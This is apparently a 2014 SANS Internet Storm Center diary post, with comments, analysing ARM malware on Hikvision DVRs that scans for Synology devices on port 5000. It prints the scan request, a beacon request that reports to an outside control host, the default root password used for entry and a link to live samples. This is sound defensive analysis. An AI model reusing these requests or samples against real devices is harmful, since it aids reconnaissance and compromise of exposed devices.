My next class:

More Device Malware: This is why your DVR attacked my Synology Disk Station (and now with Bitcoin Miner!)

Published: 2014-03-31. Last Updated: 2014-03-31 17:29:48 UTC
by Johannes Ullrich (Version: 1)
6 comment(s)

Update: Just found what looks like a bitcoin miner on the infected DVR. There are two more binaries. D72BNr, the bitcoin miner (according to the usage info based on strings) and mzkk8g, which looksl ike a simplar http agent, maybe to download additional tools easily (similar to curl/wget which isn't installed on this DVR by default). I will add these two files to https://isc.sans.edu/diaryimages/hikvision.zip shortly.

Last week, we reported that some of the hosts scanning for port 5000 are DVRs (to be more precise: Hikvision DVRs, commonly used to record video from surveillance cameras [1] ).

Today, we were able to recover the malware responsible. You can download the malware here https://isc.sans.edu/diaryimages/hikvision.zip (password: infected) .

The malware resides in /dev/cmd.so . A number of additional suspect files where located in the /dev directory which we still need to recover / analyze from the test system. The compromisse of the DVR likely happened via an exposed telnet port and a default root password (12345). 

Analysis of the malware is still ongoing, and any help is appreciated (see link to malware above). Here are some initial findings:

- The malware is an ARM binary, indicating that it is targeting devices, not your typical x86 Linux server.
- The malware scans for Synology devices exposed on port 5000. The http request sent by the malware:

GET /webman/info.cgi?host= HTTP/1.0
Host: [IP Address of the Target]:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
- it then extracts the firmware version details and transmits them to 162.219.57.8. The request used for this reporting channel:
 
GET /k.php?h=%lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Connection: close
 
So in short, this malware is just scanning for vulnerable devices, and the actual exploit will likely come later.
 
[1] http://www.hikvision.com/en/us/Products_show.asp?id=4258

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Keywords: dvr synology
6 comment(s)
My next class:

Comments

[quote]User-Agent: Ballsack[/quote]
Classy.
at least if people would watch for odd User-Agents, this would be trivial to detect.
[quote]The compromisse of the DVR likely happened via an exposed telnet port and a default root password (12345). [/quote]

" So the combination is 1-2-3-4-5? That's the stupidest combination I've ever heard in my life! That's the kinda thing an idiot would have on his luggage!"
https://www.youtube.com/watch?v=_JNGI1dI-e8
I stood up a TCP 5000 listener and within 30 minutes got:

satori received an alert from 177.206.xxx.xxx at 2014-03-31 18:18:45 on port 5000
Alert Data: GET /webman/info.cgi?host= HTTP/1.0
Host: 71.xxx.xxx.xxx:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

177.206.xxx.xxx was in fact running Hikvision video equipment.

Almost all my sources have been from South America.
And trivial to bypass...

Add on top of that the hassle of maintaining a list of valid list of useragents (which would include browser engines, operating system and/or hardware details, version numbers, etc). And then keeping that list up-to-date on anything running a web server.
Since your post here is being picked up by various blogs/media outlets, we feel it is important to post a Hikvision Corporate Response:

Actions Taken Against Third Party Virus Causing Network Cameras Scanning Attacks
April 9th, 2014 – On November 26, 2013 Hikvision became aware of an alert regarding a continuous scanning attack that can potentially be launched by a limited number of our network cameras. Since then, we worked diligently to resolve the issue and address the users’ concerns. We investigated the IP address provided, as well as the devices involved, including network cameras and network DVRs. Upon thorough analysis, we determined that the reason for the scanning attack was a worm virus called Linux Darlloz.
Reasons
The investigation discovered that all the network cameras infected with the virus were connected to the public internet without changing the default user name and password. The virus attempted to discover the password according to the password dictionary until cracking it. Upon implanting the script file, the network camera becomes a source of virus to attack the other network devices. After restarting the network camera, the script file will be eliminated, however the risk of being attacked is still there if no fix is adopted. The risk of virus attack is caused by the connection of devices to the public network directly without changing the default user name and password.
Problem Process and Tracking
Our company took immediate and decisive action after Symantec has detected the virus on Nov. 26, 2013. Since December 2013, firmware of all the network cameras and DVRs has been updated, and all the inventory products have been upgraded to protect them from being attacked by Linux Darlloz worm virus.
We took the following actions to enhance the security awareness of users to avoid the possibility of being attacked by such virus.
1. Device on Public Network Security Notice was added to the bulletin board of our global website to notify users of the possible risks of using their devices on public network. We also asked the users to change the default password to avoid risks as the network attack and privacy leaking.
2. Users can now download the firmware from our website to upgrade their devices to avoid the attack.
3. Public network security awareness campaign targeting our partners and distributors was conducted through our partners and distributors. Distributor Monthly magazine, on-site communication, training, and other available communication channels.
With decades of experiences on the surveillance industry, Hikvision attaches great importance to network and information security. With the establishment of Hikvision Security Response Center, effective communications protocol and cooperation with National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC), the China National Vulnerability Database (CNVD) and other industry recognized critical infrastructure platforms we were able to increase the investment into internet applications security. Hikvision is dedicated to continuously improving the security of our products and solutions, and is committed to complete security assurance for the users. We thank you for your continuous support.

Hangzhou Hikvision Digital Technology Co., Ltd.
April, 2014

Appendix 1?Introduction of the Hikvision Security Response Center
Organization
The Hikvision Security Response Center is a platform which is dedicated to take feedback, handle and disclose the security flaws of the Hikvision products and solutions. Hikvision pays great importance on its own security, and has taken the user security as its responsibility since the day it is found.
Principles
1. Hikvision pays great importance on security of the products and business. We promise that any feedback on the security flaw will be heard, analyzed and processed in time.
2. Hikvision supports any responsible disclosure and process of the security flaw. We promise that we will protect the users’ interests and we will reward and be grateful for those who help us to improve the security quality.
3. Hikvision objects and condemns the hacking action which damages the user’s interests taking flaw test as its excuse, including but not limited to the stealing of the user privacy and virtual property, hacking the business system, and maliciously spread the security flaws.
4. Hikvision believes that the handling and process of every security flaw and the improvement of the whole surveillance industry cannot be separated with the cooperation of each party. Hikvision hopes to promote the cooperation with other enterprises of the industry, the Security Company and investigators to maintain the information security of the industry.

Progress
The Hikvision Security Response Center is built, and the related Chinese and international webpage is created to take feedbacks, handle and disclose the security flaws of the Hikvision products and solutions.
Build connection with the dark cloud website, National Internet emergency coordination center, the National Information Security Flaw Share Platform.
Workflow
1. Reporting Security Flaw
Please send email to HSRC@hikvision.com to report the security flaw.
2. Reviewing Security Flaw
1) Hikvision Security Response Center of Hikvision will confirm and review the security flaw in one work day.
2) In three work day, the staff of Hikvision Security Response Center will handle the problem and get conclusion. If necessary, the staff may contact the reporter for assistance.
3. Fixing Security Flaw
The time of fixing will be determined by the severity of the flaw and the difficulty of handling it. High risk flaw should be fixed in 24 hours, medium risk should be fixed within 3 work days, and low risk should be fixed in 7 work days. In case the security flaw is affected by the new version delivery, the fixing time will be determined according to real situation. Emergent security announcement will be published for severe security flaw.

Diary Archives